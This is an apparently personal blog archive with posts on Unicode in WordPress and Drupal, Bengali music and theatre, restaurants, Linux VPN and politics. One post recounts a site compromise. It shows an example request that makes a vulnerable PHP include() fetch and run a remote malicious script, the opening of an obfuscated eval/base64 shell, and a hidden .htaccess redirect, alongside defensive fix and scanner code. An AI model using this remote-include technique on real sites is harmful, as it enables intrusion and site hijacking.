Thursday, March 26, 2009

Wordpress and Unicode

You type some non-English characters in the WordPress or Drupal editor. You save, only to find those characters have become ????. If this describes your problem, then you have an issue with Unicode. You need to turn on Unicode support for WordPress and Drupal. It will require some changes to code. Basically, both WordPress and Drupal support Unicode. However, by default, the databases are not configured to store Unicode characters.

WordPress


For WordPress, the modification is straightforward.

  1. Open up ‘wp-config.php’ from the root directory of your WordPress installation.

  2. Comment out the following two lines by adding ‘//’ at the very beginning of each:
    define('DB_CHARSET', 'utf8');
    define('DB_COLLATE', '');


So that section should now look like this:
//define('DB_CHARSET', 'utf8');
//define('DB_COLLATE', '');

[Source: http://hansengel.wordpress.com/2007/10/09/wordpress-unicode-and-s/]

Drupal


For Drupal, the change is a bit more involved:

  1. Go to the root directory of your Drupal installation.

  2. Save the following code in a file named collate_db.php


  3. <?php
    # Do not change anything below this ( :-) <- Rewrite editor's note.)
    require_once("includes/bootstrap.inc");
    require_once("includes/database.inc");
    require_once("includes/database.mysql.inc");
    $connect_url = 'mysql://user:pwd@server/database';
    $active_db = db_connect($connect_url);
    $sql = 'SHOW TABLES';
    if ( !( $result = db_query( $sql ) ) ) {
        # Stop here: without a table list there is nothing to loop over
        echo '<span>Get SHOW TABLE - SQL Error<br>' . "</span>\n";
        exit;
    }

    # Loop through all tables in this database
    while ( $tables = db_fetch_array($result) ) {
        # db_fetch_array() returns an associative array; take its single value
        $table = $tables[key($tables)];

        if ( !( $result2 = db_query("ALTER TABLE %s COLLATE utf8_general_ci", $table) ) ) {
            echo '<span>UTF SET - SQL Error: <br>' . "</span>\n";
            break;
        }

        print "$table changed to UTF-8 successfully.<br>\n";

        # Now loop through all the fields within this table
        if ( !( $result2 = db_query("SHOW COLUMNS FROM %s", $table) ) ) {
            echo '<span>Get Table Columns Query - SQL Error: <br>' . "</span>\n";
            break;
        }

        while ( $column = db_fetch_array( $result2 ) ) {
            $field_name = $column['Field'];
            $field_type = $column['Type'];

            # Change text based fields only
            $text_field_types = array('char', 'text', 'enum', 'set');

            foreach ( $text_field_types as $type ) {
                if ( strpos($field_type, $type) !== false ) {
                    $sql4 = "ALTER TABLE $table CHANGE `$field_name` `$field_name` $field_type CHARACTER SET utf8 COLLATE utf8_bin";
                    if ( db_query($sql4) ) {
                        echo "---- $field_name changed to UTF-8 successfully.<br>\n";
                    }
                    # One ALTER per column is enough, even if several type names match
                    break;
                }
            }
        }
        echo "<hr>\n";
    }
    ?>



  4. Look at the $connect_url line in the code (the 5th line, shown in red in the original post). You have to replace the value on that line with your installation-specific information.

  5. Open the file sites/default/settings.php under the same Drupal root directory. Copy the rest of the line of
    $db_url =

    and paste it after
    $connect_url = 

    in the above code.

  6. Save collate_db.php

  7. Open a browser window and request the collate_db.php from your browser.

  8. If everything is fine you would see something similar to this:
    access changed to UTF-8 successfully.
    ---- mask changed to UTF-8 successfully.
    ---- type changed to UTF-8 successfully.

    <--- Lines not shown --->

    watchdog changed to UTF-8 successfully.
    ---- type changed to UTF-8 successfully.
    ---- message changed to UTF-8 successfully.
    ---- variables changed to UTF-8 successfully.
    ---- link changed to UTF-8 successfully.
    ---- location changed to UTF-8 successfully.
    ---- referer changed to UTF-8 successfully.
    ---- hostname changed to UTF-8 successfully.


  9. Delete collate_db.php for security: it holds your database credentials and alters every table whenever it is requested.


You are done.

[Source: http://www.urbannatives.net/localtreechild/..._ci_and_tabl ]

Thursday, March 12, 2009

Baul

I cannot claim myself to be any expert on Baul songs. I have heard my share of Baul songs, mostly from radio. However, I have been fortunate to have two coincidences working for me in this respect. First, I like writings of Sudhir Chakrabarti. He was a professor of Bengali, but his passion was Bangla songs. Though he started writing rather late, he has been relentless in churning out articles since he started writing popular articles with seriousness. These articles are not just nonsensical pot-boilers. There are goods and bads, but none is insignificant. Sudhirbabu's other passion is Bengali Folk culture. I think I have painted the description of the passion with too broad a brush, but could not find a better description than this. He doesn't do it as a paid occupation. It's his labor of love. I don't know whether he follows the right research methodologies or not. But I could not care less. His research produced books like ব্রাত্য-লোকায়ত লালন (Bratyo Lokayoto Lalon), বাউল ফকির কথা (Baul Phakir Katha). Through these books and other writings of Sudhirbabu I got interested in the Baul way of life, and especially the Baul songs, though I learned that Baul songs are part of the Baul way of life. Without understanding or experiencing the Baul way of life one can neither appreciate nor fathom the Baul songs.

My other, and possibly bigger, influence for Baul songs is my friend Sudipto Chatterjee. Sudipto teaches and works in theater and performance studies. But he picked up a penchant for Lalon Shah pretty early on. I remember the day when I first met him, about fifteen years ago, he boasted that he had already collected all Lalon songs. Only later I could understand his pride in that possession. He (and Theater director Sumon Mukhopadhyay) travelled to Kushthita, Lalon's birth and workplace, in Bangladesh in 1997. The materials they collected there, and since then, finally bore fruit in the form of a Performance called "The Man Of The Heart". A performance on Lalon's life and work, written and performed by Sudipto and directed by Sumon. I have heard numerous Lalon songs from Sudipto, along with stories, anecdotes and explanations. I heard about Panju Shah, Duddu Shah first through him. These, Sudhirbabu's books, gave me a better idea about the journey of Baul culture through history, both social and political. In most cases, these two were intermingled intimately.

Later, through a Bangla folk band called দোহার (Dohar), I first heard Abdul Karim's song. And I was bowled over immediately. Later I tried to dig up information from the web about Abdul Karim, who uses Baul Abdul Karim as his bhonita in some songs. There is not a lot of information about him on the web, at least not as much to satisfy my curiosity. However, I came to know that he is still alive and well, though he is over 90 years of age. He still writes songs. But he has already become an institution in Bangladesh. I could not figure out whether he leads a strict Baul life. But that does not matter to me at this point. You can check out some of his songs on YouTube by searching on his name.

Wednesday, February 04, 2009

Ain’t No Luddite

I am not an adopter. I don't work to stay ahead of the technology curve. Rather, I fall quite far back in that curve to see all my friends and most of my family and acquaintances pass by me and my wife. But the truth is that I am quite happy and content being a follower. I keep my OS at least one version behind the latest and the greatest. Currently, even though my sparingly-used Windows machine runs XP (used only for music production since I have already invested money and learning-time on software that runs only on Windows), I have the latest OS version (Ubuntu Intrepid Ibex 8.10) on my primary home machine. I resisted having a cell phone for quite some time before finally jumping on the bandwagon in 2003. Even then I have a pretty basic cell phone which is used as a - surprise! surprise! - phone to call people. No blackberry, no iPhone, no Android, no nothing. We don't have an LCD or Plasma TV, mostly because we don't need it. We don't watch TV or movies that much. 90% of time, our TV is playing either Baby Einstein DVD or PBS Kids show. Our DVD player is a $25 Coby. My home theater is an 8-year old system. My Bose Acoustimass speakers are sitting comfortably in the closet, gathering dust. Five-and-half-years since we have moved into this house, I didn't get energy, urge or serious nudge from Paramita to hook those on. On the social networking side, I have got onto Orkut after having a dormant account for quite a while, thanks to Paramita for finally making me active there. But that's been almost one-and-half years. By that time most of my friends there have moved on to the greener pasture of Facebook. I have too. But only recently. And I am still trying to figure things out there. Now I see people are using Twitter. I guess, it will take me at least a year or two before I get on to Twitter.

The reason I started this post is, I think the best thing that has happened in the last two years on the Technology side, as far as I am concerned, is Pandora. It's really awesome. Those who haven't yet found Pandora: it's a Music Genome Project. The site says:
Together we set out to capture the essence of music at the most fundamental level. We ended up assembling literally hundreds of musical attributes or "genes" into a very large Music Genome. Taken together these genes capture the unique and magical musical identity of a song - everything from melody, harmony and rhythm, to instrumentation, orchestration, arrangement, lyrics, and of course the rich world of singing and vocal harmony. It's not about what a band looks like, or what genre they supposedly belong to, or about who buys their records - it's about what each individual song sounds like.

So the idea is that you start with one of your favorite songs. Then based on the musical attributes of the song, Pandora will select other songs. For each song, you can tell Pandora whether you like this song or not, thereby 'training' Pandora to your taste. You can create 'Radio Stations' based upon this song. A 'Radio Station' can be created by Artist or by Genre too. There is a cool feature called Quick Mix, which is basically a random play of songs from Station you have selected.

It's really easier to experience and experiment with Pandora than explain how it works. You need a registration for creating Stations. But registration is free and requires very little information. However, there is one caveat. The service is only for North American audience. I understand that is due to some licensing issue. If you are in North America (or have a North American IP address ... wink wink), go there and have some wonderful musical experience.

Monday, February 02, 2009

Thursday, January 08, 2009

I live in the San Francisco Bay area. We have a pretty sizable Bengali population from both West Bengal and Bangladesh. I guess there are a few Bengalees from Tripura as well, though I personally know none. With this population, and mind you most have quite a bit of disposable income, it is quite sustainable to run at least two restaurants serving traditional and modern Bengali food, one would think. But in reality, there is none. In my 10+ years stay in this area, I have seen a few restaurants come and go. First there was Charulata. It closed doors after running for less than a year. Then came Cafe Dhaka. They had a longer life. I think it ran for about 4 years before it went out-of-business. Actually there is Gulistan. As far as I know they are still open. But in all fairness, they are more famous for their North-Indian and Pakistani cuisine than Bengali food. We have tried the place a couple of times. In our opinion also, their Lamb Chops are better than their Ilish preparation.

Last year-end, while we were in Los Angeles, we tried Aladin - LA's Bengali restaurant.

My general observation for all these restaurants is that the food is mediocre, at best. That, too, lacks consistency of quality. One day your Shorshe Ilish is so delicious that you rush back next weekend only to find a different tasting Shorshe Ilish that is so, um, bad that you would think that you have come to a different place. Also, these places lack any characteristic decor (Charulata had the best decor among these, though that doesn't say much), some are outright dirty by western standard. The service is homely but unprofessional. Overall, not a good eating experience.

That makes me think: why do Bengali restaurants not make good business? I think there are valid reasons at different levels.

  • Bengali food is generally bland compared to North Indian food. Bengali food requires a developed palate. Compare Lau Ghonto with Aloo Gobi

  • Bengali non-vegetarian specialty is fish cooked in such a way that it keeps the fishy flavor, which is synonymous to smelly for non-initiated. Any place that cooks fish in Bengali way smells repellingly fishy

  • Bengalis want to eat only exotic or semi-exotic items in Bengali restaurants. I have heard Bengalis saying, "I can cook and eat those daal and lau ghono at home. Why would I pay for those. I will go to a restaurant to have Paturi, Daab Chingri, Koi Gonga-Jamuna. If insisted I can even try Shorshe Ilish, but that better be excellent."

  • Bengali entrepreneurs who take the risk of opening these restaurants ignore aspects of a restaurant business other than the food quality. There also they try to cut corners. Without requisite amount of cash infusion to put up a comfortable place with good service and food, it's hard for Bengali restaurant business to run successfully. If you have an already established cuisine with unlimited pool of customers who are addicted to that kind of food, you can forego the frills. Take Pakistani-Indian restaurants like Shalimar, Pakwan for example.


I would say, if you want to start a Bengali restaurant go with a good investment and for a longish haul. Hire the best Bengali cook. Get him or her from India or Bangladesh. Don't just make your mother-in-law toil in the kitchen pretending to be the head-cook. She may cook excellent Mochar Ghonto, but she definitely lacks training to manage and run the show in a busy restaurant. Set up a good ambiance. Use good plates and silver. Have enough and properly trained servers and busboys. Get a trained manager and steward. Make it a legitimate business instead of looking at it as a part time source of extra income with some spare-change investment. Respect the business and get the respect and patronage of the customers.

Wednesday, January 07, 2009

Don’t Read This …

... instead, read Robert Fisk in The Independent - Why do they hate the West so much, we will ask. What I wanted to say and could not, is there.

...

As we are entering into the new year, the news and life is bleak all around. This is particularly true for the people in Gaza. They are a hapless victim of a lethal pounding from Israel. What Israel is doing in the name of 'self-defence' is totally and absolutely unacceptable to any person of rationality and conscience. This is not to condone the behavior of Hamas, but a much bigger blame must be affixed to Israel. But I guess this is somewhat expected from an aggressor and occupier like Israel.

What is more unacceptable to me is US foreign policy towards Israel and Palestine. In 2008 Israel was the recipient of the biggest chunk of US aid. 2.4 Billion. "Virtually all of this money is used to buy weapons (up to 75% made in the U.S.). Beginning in 2009, the U.S. plans to give $30 billion over 10 years." (Source: Parade magazine) I have tried to figure out the reason for this uncritical and total support of Israel from US, especially if we remember the English statesman Lord Palmerston's aphorism that "Nations have no permanent friends or allies, they only have permanent interests." It is true that US has to have a strong ally in that region. Its strategic importance is too high to ignore for US. Israel fulfills that requirement. However, it has also become quite clear that the blind support of Israel and its aggression has given rise to a deep hatred towards US. Not only in that region alone, but all around, especially with such a blatant nonchalance from Israel's part when more than a quarter of the victims are civilians, mostly children. Israel-Palestine issue has become a very potent tool for separatists and terrorists to recruit and deploy youths all around the globe - be it Middle East, Afghanistan, Iraq, Pakistan or Kashmir. In the final tally, a blind support of Israel's aggression returns a negative balance to USA's foreign policy balance sheet. I guess, US can still support Israel and its existence and still maintain some semblance of balance. It may not be an easy task. But the diplomats and the elected officials are not selected or elected to do easy tasks.

Monday, January 05, 2009

Fast food for thought

I just rebooted my office machine running CentOS 4.6, which is based on Red Hat Enterprise distribution. It was running for 121 days, i.e. almost 4 months!!

Ubuntu Intrepid and vpnc

My company has a decent work-from-home policy. Every Thursday we can work from home. And most do, including myself. In addition to the regular Thursdays, we work from home whenever there are project deadlines - which is almost always. Hence, to have a solid VPN connection is a must for me.

My last non-Ubuntu desktop was Fedora. I compiled the Cisco vpnclient and used it without a problem. When I switched to Ubuntu Edgy (6.10) I started using the open source vpnc which worked quite nicely. The upgrade to Feisty (7.04) and Gutsy (7.10) worked fine too. But from Hardy (8.04) the problem of dead-peer-detection raised its ugly head. There were patches available, but that didn't solve the problem for me. I was looking forward to the Intrepid (8.10) release hoping that the vpnc issue will be resolved for good. After Intrepid was released there were contradictory reports about whether the dead-peer-detection issue has been resolved. I decided to test it out myself. So I upgraded to Intrepid.

vpnc can be used from command line, or else one can install the vpnc plugin for the network-manager (nm) and control the vpnc connection from the network-manager applet. Until now, I have only used the command-line. But this time I have tried both for testing. This is what I have found:

  • The dead-peer-detection issue is solved both in the command-line client as well as network-manager plugin when you pass the dead-peer-detection interval value 0 to the command-line program or check a box in the network-manager plugin.

  • network-manager plugin has a bug that overwrites the resolv.conf when the VPN is disconnected. I am forgetting what exactly is the nature of the bug, but basically it didn't revert back to the original resolv.conf after VPN session ended. The bug may only be for the static IPs.

  • Even if the dead-peer-detection issue was resolved, my VPN connection would just stall for a minute or two before continuing after I have typed about 10-15 characters in my SSH window. And this repeats over and over again. Googling the problem suggests something to do with routing table and/or DNS lookup. I tried different things for a while but none could resolve this issue.


At last I gave up and went back to the proprietary cisco vpnclient. I compiled and installed it following this post. Since then I am having a smooth VPN ride. I would love to go back to the open source vpnc client, but not at the expense of stability of connection. I need to earn my bread.

Tuesday, June 24, 2008

The new voice of our time

A couple of weeks back our local cultural association Sanskriti organized its fourth Natyomela - a Theater festival. Our group ENAD could not participate in the festival this time. However, this year Sanskriti introduced a slot for an "outside" group. That outside group was ECTA from New Jersey. They brought a new play Taconic Parkway, written and directed by Sudipta Bhowmik.

Sudipta Bhowmik was somewhat known to the bay-area theater aficionados. He is operating in Bengali theater scene in north America for a while now. He is quite well-known especially in the east-coast circuit. For some reason, he never got a chance to bring his play to the west coast before. We, at ENAD, were happy to do Ron - our last production - which was his play. I think that was the first exposure people got to Sudipta Bhowmik's work here in the bay area.

This time he also directed his three-cast play Taconic Parkway. It's a very powerful play. It may not put you in an internal conflict that Ron might have, but this play may well put you in a spell. He has masterfully woven an unusual story in a non-histrionic way. (That is, if you take the negative connotation of histrionics.) I will go out on limbs and say that Sudipta Bhowmik is producing some of the most powerful and important Bengali plays of our time. That includes Kolkata and West Bengal. (I am not very conversant with Dhaka's, or Bangladesh as a whole, contemporary plays, mostly due to accessibility problem.) More importantly, he is providing a glimpse to the actual USA-residing Bengalees. This is not the picture you get in mainstream magazines and mundane media portrayal.

Someday, I hope to write a more studied observation of his plays through more minute reading, but as a somewhat informed audience I can only appreciate his work. He is definitely blessed with some very competent actors. I am sure that helps him not only to mount a good play as a director, but also as a playwright since he can experiment with his characters. But still, the bottom line remains that he is writing some worthwhile plays of our time.

Thank you Sudiptada. Thank you for the plays.

Sunday, May 25, 2008

Tin Pahaarer Gaan

I came across Birendra Chattopadhyay's work when, I believe, I was in high school or in first year of college. My impressionable mind immediately fell in love with his work. He was never a mainstream poet. But his poetry bore a unique and strong voice which I seldom found in others. Around the same time I found a cassette published by School of People's Art which contained songs and recitation of Birendra Chattopadhyay's poems. The songs were created out of his poems by Binoy Chakrabarty. He did an excellent job. Together with the poems and this cassette, Birendra Chattopadhyay made a lasting impression.





I loved a long poem called 'Tin Pahaarer Gaan' literally "The song of Three Mountains" or "The song of a mountain called Tin Pahaar". It starts with 'Pahariya madhupur metho dhulipoth' and continues to give a vivid and wonderful imagery. Around that time I also started composing songs. So I put tune to it - not to the whole poem though. I stopped when I thought was the right moment for a song to stop. This was 1988-89. I kept it to myself and never published it. In 2007 I arranged it. This is that song.

Sunday, May 11, 2008

Portrait of a hack

It's been a long time since I updated the page. Again. As I was intending to update the page with the report of my latest endeavor, something unexpected happened.

Last Sunday morning, I woke up to receive a terse mail from my hosting company - Host Monster - that my basus.net account had been deactivated due to "terms of service violation". So I called them. The Tech support guy confirmed that the account had really been deactivated because there is a phishing page lurking inside my site. He suggested that I talk to their Abuse department. Even though it was a Sunday, there was somebody in the Abuse department I could talk to. She pointed me to a directory called 1/ inside my webroot folder. That, and a few other files, seem to be gratuitous contributions of the hackers. She said once I removed the offending pages and they confirmed that I did, they could reactivate the account. I got off the phone and the first thing I did was to remove the 1/ directory. Looking back, I think, that was a knee-jerk reaction. I could have avoided that. I, then, moved my original webroot folder and put up a placeholder page instead. After these minor surgeries I called my hosting company's abuse department. She looked at the directory to confirm that the offending pages are really gone. Once confirmed she immediately reactivated my account. I briefly chatted with her about the possible backdoor and inquired if they had any tool to sniff out backdoors. They don't have any tool but she gave me pointers to some usual suspect applications. Fortunately I didn't have any such application. However, that's unfortunate too, since now I have to hunt the backdoor myself manually. It also means that the backdoor is possibly an inadvertent creation of my sloppy coding. Tooo baad.

But one thing I want to mention here, I found my hosting company's support impeccable. They were helpful, to-the-point and not too finicky. Deactivating my site showed they had a good policy in place against questionable content. Kudos.

Once my mail server etc. were back online and the offending material offline, I had a few tasks at hand. In order of priority, they were:

  1. Remove all injected files and content

  2. Find and fix backdoor

  3. Put site back online


So, here are some interesting things I have found on the way. These must have been well-documented in some security website. But, here is what I have found.

Modus Operandi: Once the hackers find a backdoor, they push a file through the backdoor. This file then becomes the hackers' gateway. They come and go through this door at will. They can pretty much see what's inside, put files (scripts) there and sometimes hijack the site.

File Extension: Some of the initial files that the hackers uploaded had .jpg extensions but they are actually PHP scripts. For example, php3.jpg, lila.jpg or sh6.jpg. I think they want the site owner to overlook any .jpg file, thinking they are image files and hence harmless. The PHP engine, though, is not fooled by the extension. A file pulled in through include() is executed whatever its extension, as long as it contains valid PHP code.

Offending files: The most interesting is php3.jpg. It looks like a binary file

 <? eval(gzinflate(base64_decode('


However, if you look closely, you will notice that it starts with "<? eval(gzinflate(base64_decode('". This tells the PHP engine to base64-decode the content that follows, inflate (decompress) it, and execute the result with eval(). When I decoded it, it became an HTML page which looks like this in a browser:

PHP Shell Screenshot

Backdoor: There were a couple of backdoors in my site (at least the ones that I have found). All of them are similar.

A PHP script can run another script by calling include(). Suppose you have a script named foo.php and another named bar.php. In foo.php you may have a call like:
include('bar.php')

Now if you request foo.php from a browser, it will also execute bar.php, even though bar.php was not explicitly called or requested.

bar.php does not need to reside in the same directory, or even on the same file system. It may be sitting on a different web server, 10000 miles away, reachable via an HTTP call - http://bar.com/bar.php. foo.php can still execute bar.php via HTTP. Your include will simply say,
include('http://bar.com/bar.php')

PHP will take care of opening a socket to the bar.com server, creating an HTTP request for bar.php and executing the content of the HTTP response. This works only when remote includes are enabled in php.ini (allow_url_fopen, and since PHP 5.2.0 also allow_url_include, which is off by default).

Now suppose that, instead of a hard-coded http://bar.com/bar.php as the argument of the include() call, you pass a request parameter - something that you got via a POST or a query string.
$myscript = $_REQUEST['myscript'];
include($myscript);

Now you have a backdoor. How so? If a malicious hacker knows about these two lines, she can make a request to foo.php like this
http://<servername>/foo.php?myscript=http://<hackersserver>/malicious_script.php

foo.php will obediently execute whatever malicious_script.php asks it to do. Now the question is how the hackers know of those two lines of code. By looking at other links on your site (or other sites which link to your site) and guessing. This is not difficult.
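The vulnerable include() pattern described above next to an allowlist-based replacement, as an added example that is not the author's actual fix. The page names, the temporary pages directory, the function name resolve_page and the sample request values are assumptions constructed for illustration.

```php
<?php
// Added example, not the author's code. Page names, the temporary pages
// directory and the sample request values are constructed for illustration.

// Vulnerable pattern from the post: the request value goes straight to include().
//   $myscript = $_REQUEST['myscript'];
//   include($myscript);

// Hardened pattern: the request only selects a key. The file name comes from
// a fixed allowlist, so no URL, path or extension sent by the client is used.
const PAGES = [
    'home'  => 'home.php',
    'music' => 'music.php',
];

function resolve_page($requested, string $pagesDir): ?string
{
    // Arrays (?myscript[]=x) and unknown keys are rejected outright.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($pagesDir);
    if ($base === false) {
        return null;
    }
    // The resolved file must exist and sit inside the pages directory, which
    // also rejects an allowlisted name that has been replaced by a symlink.
    $path = realpath($base . DIRECTORY_SEPARATOR . PAGES[$requested]);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Defence in depth, set in php.ini rather than in code:
//   allow_url_include = Off   (the default since PHP 5.2.0)

// --- Demo on a throwaway directory with constructed inputs ---
$pagesDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($pagesDir, 0700, true);
foreach (PAGES as $key => $file) {
    file_put_contents($pagesDir . DIRECTORY_SEPARATOR . $file, "<?php echo \"[$key page]\\n\";");
}

$samples = [
    'home',                                               // legitimate
    'http://hackersserver.example/malicious_script.php',  // remote include attempt
    '../wp-config.php',                                   // path traversal
    'php3.jpg',                                           // uploaded file posing as an image
    ['home'],                                             // array instead of string
];

foreach ($samples as $value) {
    $path = resolve_page($value, $pagesDir);
    echo str_pad(json_encode($value, JSON_UNESCAPED_SLASHES), 62);
    if ($path === null) {
        echo "rejected\n";
    } else {
        echo 'include -> ';
        include $path;
    }
}
```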

I had precisely this backdoor. Three of them. I think hackers exploited two out of three. I have fixed the code, or I think I have until hackers expose another backdoor. I have also written a couple of monitoring and reporting scripts which will periodically look for any change in my site. Let's see what happens.

In a subsequent post, I will try to write more about the files the hackers put.

Update: I never got a chance to write more about the files the hackers uploaded. However, there is another thing of importance here. The hackers modified my root .htaccess file. That's the configuration file for the Apache web server and it affects the tree underneath, unless overridden by another local .htaccess file. They put a Rewrite rule in the .htaccess. An Apache rewrite rule can modify a request line. For example, a browser may request a file called "foo.html". Via a Rewrite rule, you can serve some other file, say "whatever.html". Since this happens without the browser's knowledge, the browser still thinks that it got the requested foo.html file. That's exactly what happened in my case. The hackers wrote a rewrite rule in such a way that if a request came through a search result (identified by the Referer header), it shows some Viagra ad page that they uploaded. And be careful, they bury the Rewrite rule in the .htaccess file after a bunch of blank lines, so that when you open the file in an editor, you won't see it without scrolling down. Very clever.
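A scan for the three artifacts described in this post (PHP hidden behind an image extension, the eval(gzinflate(base64_decode( wrapper, and a Referer-conditioned rewrite rule buried under blank lines), as an added example that is not the author's own monitoring script. The sample webroot, the BLANK_RUN threshold and the function names are constructed for illustration.

```php
<?php
// Added example, not the author's monitoring script. The sample webroot,
// BLANK_RUN threshold and function names are constructed for illustration.

const IMAGE_EXT   = ['jpg', 'jpeg', 'png', 'gif'];
const OBFUSCATION = '/eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(/i';
const BLANK_RUN   = 5; // assumed threshold for "buried under blank lines"

// True when the data starts with a JPEG, PNG or GIF signature.
function has_image_signature(string $data): bool
{
    foreach (["\xFF\xD8\xFF", "\x89PNG\r\n\x1A\n", 'GIF87a', 'GIF89a'] as $magic) {
        if (strncmp($data, $magic, strlen($magic)) === 0) {
            return true;
        }
    }
    return false;
}

// Flags rewrite directives that follow a long run of blank lines, and any
// RewriteCond that keys on the Referer header.
function scan_htaccess(string $data): array
{
    $findings = [];
    $blank = 0;
    foreach (preg_split('/\R/', $data) as $i => $line) {
        if (trim($line) === '') {
            $blank++;
            continue;
        }
        if ($blank >= BLANK_RUN && preg_match('/^\s*Rewrite(Rule|Cond)\b/i', $line)) {
            $findings[] = sprintf('line %d: rewrite directive after %d blank lines', $i + 1, $blank);
        }
        if (preg_match('/^\s*RewriteCond\s+%\{HTTP_REFERER\}/i', $line)) {
            $findings[] = sprintf('line %d: rewrite conditioned on Referer', $i + 1);
        }
        $blank = 0;
    }
    return $findings;
}

// Walks the webroot and returns [relative path => list of findings].
function scan_tree(string $root): array
{
    $report = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $data = (string) file_get_contents($file->getPathname());
        $hits = [];
        if (in_array(strtolower($file->getExtension()), IMAGE_EXT, true)
            && !has_image_signature($data)) {
            $hits[] = 'image extension but no image signature';
        }
        if (preg_match(OBFUSCATION, $data)) {
            $hits[] = 'eval(gzinflate(base64_decode( wrapper';
        }
        if ($file->getFilename() === '.htaccess') {
            $hits = array_merge($hits, scan_htaccess($data));
        }
        if ($hits) {
            $report[substr($file->getPathname(), strlen($root) + 1)] = $hits;
        }
    }
    ksort($report);
    return $report;
}

// --- Demo on a throwaway webroot built from constructed sample files ---
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'webroot_' . bin2hex(random_bytes(4));
mkdir($root . DIRECTORY_SEPARATOR . '1', 0700, true);
// A file that really starts with a JPEG header: must not be flagged.
file_put_contents("$root/photo.jpg", "\xFF\xD8\xFF\xE0" . str_repeat("\0", 32));
// Inert sample text shaped like the file from the post; it is never executed.
file_put_contents("$root/1/php3.jpg", "<? eval(gzinflate(base64_decode('QUJD')));");
// Rewrite rule hidden below 40 blank lines, keyed on the Referer header.
file_put_contents(
    "$root/.htaccess",
    "RewriteEngine On\n" . str_repeat("\n", 40)
    . 'RewriteCond %{HTTP_REFERER} (google|yahoo) [NC]' . "\n"
    . 'RewriteRule ^foo\.html$ whatever.html [L]' . "\n"
);

foreach (scan_tree($root) as $file => $hits) {
    foreach ($hits as $hit) {
        echo "$file: $hit\n";
    }
}
```

Run periodically from cron against the real webroot, a non-empty report is the signal to investigate; the signature check only looks at the first bytes, so it complements rather than replaces a change-detection baseline.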

Tuesday, January 29, 2008

Song puzzles

I have some old recordings in my possession. Old means really old - at least fifty years or more. I have a cousin, who is a professional Audio Engineer with a big studio in India. But his passion is music from a very very tender age. As they say, he lives for music. When he was a student, he used to roam around in Kolkata to collect old records. I guess these recordings came from those ventures. These are recorded from noisy 78 RPM disks. I haven't tried to cleanup the recordings. I have noticed in my earlier attempts of cleaning that unless one has lots of time and really good tools, it's better to leave the noise. Incompetent noise-reduction kills the song more than the noise does.

Move over to my Music Broadcast page and listen to the Recognize the singers section. If you can recognize them before I publish the name, drop me a line.

Monday, December 31, 2007

What is a great art?

I have found that my idea of art and its impact on the audience has changed over time. I understand, this is quite natural and most everybody else also experience this changing attitude towards art and its effect over time. It's just the other side of the fact that I get moved differently every time I read, say, the play Daakghar (The Post Office).

Art, no matter what form, needs to move its target audience emotionally. We - this term may need some elaboration, but please take it on the face value for now - tend to over-analyze art. I even feel that sometimes we go to some concert or play or read some book just to analyze and critique the art. And in the process we forget to enjoy it. May be, on a subconscious level, we are thinking, "I may not be an artist but I am a critique who can analyze and tear apart any artist's work - main hoon baap kaa baap".

What I said above is not directed at anybody in particular but me. A few months back I realized this sad fact that the gratuitous critic in me is coming in the way of my enjoyment and the art. My training and knowledge in some forms of art, namely music and drama, is not helping me either. During an intense dramatic moment of a play, part of my mind is analyzing the blocking, the lights, the actors' business and so on. While listening to a new song, my mind gets unnecessarily concentrated on the arrangement of the song, the chord progression, the crispness of the recording. In the process the dramatic moment and the song are gone, probably forever. The first experience never comes back.

I have been actively trying to correct it since I found this lacking of mine. And trust me, it's not easy. Apart from untraining and retraining my senses and mind, there are some more philosophical dilemmas to sort out. The biggest of them is, "Just because an art moves me emotionally, should I call it a great piece of art?" I tend to answer a subjective "yes" though I am fully aware that some second rate tearjerkers can and do move me emotionally quite often. And of course there is the other side too, where a piece, which is considered great art by many, failed to impress me at all. However, I rationalize that by accepting that it may be a result of my improper training.

The bottom line of art appreciation is training. Most of us are self-trained in art appreciation and most of us are smart enough to separate wheat from chaff. The problem is with the borderline stuff - the stuff that cannot be called great at the first experience nor can be pushed aside as crap. A great art will move you emotionally as well as give you enough food for thought that you ruminate for a few days, if not weeks. A crap art will give you neither. The borderline case will give you some. Unfortunately, the world of art is full of these borderline cases. And the fact that it is the majority in the world of art forces us to bring out the critic from inside us more often than it forces us to just sit back and enjoy. That's a sad fact of thinking life.

Friday, December 21, 2007

A Tale of Java, Ubuntu and Fonts

As a part of an ongoing Java project, I had designed a rudimentary Java text editor. The project is a WIP, so every so-many-months I put my mind on it only to stray away in a few days. Last time I worked on the editor part of it, I was running Fedora core with Java 1.4, maybe 1.5. The code loads a non-English font into the editor and then you can see those fonts as you type. The font is a ttf font which was loaded as a System font in the /usr/share/fonts directory with the updated font-cache. It worked just fine, loading and showing this font (the name, BTW, is itxBeng. It's a Bengali font) without any glitch.

A couple of weeks back, I opened up the code on my Ubuntu 7.04 with Java 1.5. And surprise, surprise!! When I am supposed to see Bengali characters, I now see gibberish. My first reaction was that I might have changed some code and forgot about it. I told you, I haven't touched this code in a while. So I looked at the font-loading code, but did not find any problem or resolution. I was furiously scratching my head. No clue, what's happening!?

Next day I ran the code on my office computer, which is running CentOS 4 (basically a repackaged Redhat distribution) and Java 1.5. To my not-so-big-surprise, the fonts loaded just fine. So I narrowed down the issue to an Ubuntu problem. So next I installed Java 1.6 on my Ubuntu machine. This time the fonts loaded fine. I haven't played extensively after that, so I don't know if there are other problems. But the most intriguing problem is gone, or at least I have found a work-around.

Bottom line: Ubuntu 7.04, Java 1.5 and ttf fonts manually loaded in system do not play well.

Monday, December 17, 2007

After a hiatus

I just finished directing a play by Sudipta Bhawmik called Ron. It's a very relevant story of our time waiting to be told. Sudiptada has woven a magic spell of a contemporary tale on an age-old philosophical conflict between the need to fight some wars and the principled position of anti-war. This not only looks at the current time, it does so from the first generation and second generation immigrants' perspective.

After the play there was a short Q&A session with the playwright where he said that the play is definitely anti-war. But I am positive nobody can call it propagandist. I actually found it to be well-balanced and portrays the viewpoint of a soldier and his family's perspective in a very touching way.

